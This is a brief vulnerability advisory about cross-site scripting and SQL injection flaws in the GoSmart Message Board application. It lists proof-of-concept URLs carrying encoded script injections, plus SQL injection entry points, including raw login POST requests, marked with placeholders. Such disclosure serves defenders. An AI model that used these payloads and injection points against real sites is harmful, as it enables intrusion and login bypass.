|
Go Smart Inc GoSmart Message Board Multiple Input Validation Vulnerabilities
An exploit is not required to leverage these issues. The following proof of concept examples are available: Cross-site scripting: /messageboard/Forum.asp?QuestionNumber=1&Find=1&Category=%22%3E%3Cscript %3Ealert%28%29%3C%2Fscript%3E%3C%22 /messageboard/ReplyToQuestion.asp?MainMessageID=%22%3E%3Cscript%3Ealert% 28%29%3C%2Fscript%3E%3C%22 SQL injection: messageboard/Forum.asp?QuestionNumber=[SQL CODE HERE]&Find=1&Category=1 messageboard/Forum.asp?Username=&Category=[SQL CODE HERE] messageboard/Forum.asp?QuestionNumber=[SQL CODE HERE]&Find=1 messageboard/Forum.asp?Category=[SQL CODE HERE] POST /messageboard/Login_Exec.asp HTTP/1.1 Host: www.example.com Content-Type: application/x-www-form-urlencoded Content-Length: 29 Username=[SQL CODE HERE]&Password=1&Login=1 POST /messageboard/Login_Exec.asp HTTP/1.1 Host: www.example.com Content-Type: application/x-www-form-urlencoded Content-Length: 29 Username=1&Password=[SQL CODE HERE]&Login=1 |
|
Privacy Statement |